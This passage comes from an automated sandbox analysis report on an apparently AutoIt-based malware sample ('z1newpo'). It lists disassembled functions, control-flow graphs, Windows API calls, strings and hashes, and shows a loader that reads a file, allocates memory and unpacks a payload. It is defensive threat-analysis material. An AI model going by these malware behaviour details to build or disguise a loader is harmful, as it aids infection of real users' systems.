                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                    • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                    • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                    Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc
                                                    • String ID: Default
                                                    • API String ID: 1579825452-753088835
                                                    • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                    • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                    • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                    Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1981 40f6b4-40f6c2 1978->1981 1982 40f6af-40f6b2 1978->1982 1979->1969 1979->1971 1990 425d43-425d5f call 414d30 1980->1990 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1980 1988 425d05-425d0b 1985->1988 1989 40f6dc-40f6df 1985->1989 1988->1973 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1984
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                    • String ID: AU3!$EA06
                                                    • API String ID: 1268643489-2658333250
                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                    Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2005 42b038-42b03f 2000->2005 2008 401193-40119a 2001->2008 2006 401151-401157 2002->2006 2007 40119d 2002->2007 2005->2003 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2000 2014 4011af 2009->2014 2010->2008 2011->2000 2017 401225-42b06d call 468b0e 2011->2017 2015 401163-401166 2012->2015 2016 42b01d-42b024 2012->2016 2013->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2008 2021->2008 2032 401204-401216 CreatePopupMenu 2021->2032 2022->2003 2023->2003 2024->2000 2034 401174-42afde call 45fd57 2024->2034 2034->2003 2045 42afe4 2034->2045 2045->2008
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                    Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                    APIs
                                                    • _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                    • String ID: ,*H$4*H$@fI
                                                    • API String ID: 615853336-1459471987
                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                    Function 0426A970 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2065 426a970-426a9c2 call 426a870 CreateFileW 2068 426a9c4-426a9c6 2065->2068 2069 426a9cb-426a9d8 2065->2069 2070 426ab24-426ab28 2068->2070 2072 426a9da-426a9e6 2069->2072 2073 426a9eb-426aa02 VirtualAlloc 2069->2073 2072->2070 2074 426aa04-426aa06 2073->2074 2075 426aa0b-426aa31 CreateFileW 2073->2075 2074->2070 2077 426aa55-426aa6f ReadFile 2075->2077 2078 426aa33-426aa50 2075->2078 2079 426aa93-426aa97 2077->2079 2080 426aa71-426aa8e 2077->2080 2078->2070 2081 426aab8-426aacf WriteFile 2079->2081 2082 426aa99-426aab6 2079->2082 2080->2070 2084 426aad1-426aaf8 2081->2084 2085 426aafa-426ab1f CloseHandle VirtualFree 2081->2085 2082->2070 2084->2070 2085->2070
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0426A9B5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction ID: 4710044c76ccde9fc9efc4b6d55fdea9b9f3ca995a2c47bc8f96ab34a8a29537
                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction Fuzzy Hash: F3510C75B20209FBDF24DFA4CC49FEE77B9AF48700F108554F60AEA180DA74A684DB60
                                                    Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2095 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2098 427190-4271ae RegQueryValueExW 2095->2098 2099 40e4eb-40e4f0 2095->2099 2100 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2098->2100 2101 42721a-42722a RegCloseKey 2098->2101 2106 427210-427219 call 436508 2100->2106 2107 4271f7-42720e call 402160 2100->2107 2106->2101 2107->2106
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                    • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                    Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2112 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                    Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2113 401b80-401b96 2114 401b9c-401bb3 call 4013c0 2113->2114 2115 401c7e-401c84 2113->2115 2118 42722b-42723b LoadStringW 2114->2118 2119 401bb9-401bd4 call 402160 2114->2119 2121 427246-427253 call 40e0a0 2118->2121 2124 427258-427275 call 40d200 call 4348de 2119->2124 2125 401bda-401bde 2119->2125 2129 401bf3-401c79 call 412f40 call 412fba call 411567 Shell_NotifyIconW call 402250 2121->2129 2124->2129 2137 42727b-42728f call 40d200 call 4348de 2124->2137 2125->2121 2127 401be4-401bee call 40d200 2125->2127 2127->2129 2129->2115
                                                    APIs
                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                    • String ID: Line:
                                                    • API String ID: 1874344091-1585850449
                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                    Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 1607946009-824357125
                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                    Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                    • String ID:
                                                    • API String ID: 3170942423-0
                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                    Function 0426C400 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 152fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0426C2F0: Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0426C527
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: 379Q66155OFYRP8HL28OIS
                                                    • API String ID: 2694422964-1953664903
                                                    • Opcode ID: 629c445771c9d267625f2dc89f7d6a967177e457954e117c6b7db84593c53b92
                                                    • Instruction ID: 5b7e4afd0dce5660d8edcfc2f860de36dcf4c1f4669c93aad230e5eaa982b381
                                                    • Opcode Fuzzy Hash: 629c445771c9d267625f2dc89f7d6a967177e457954e117c6b7db84593c53b92
                                                    • Instruction Fuzzy Hash: 7651B530E14289DAEF11EBF4C918BEEBB79AF05304F004199E6457B2C0D7B91B44CB65
                                                    Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Error:
                                                    • API String ID: 4104443479-232661952
                                                    • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                    • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
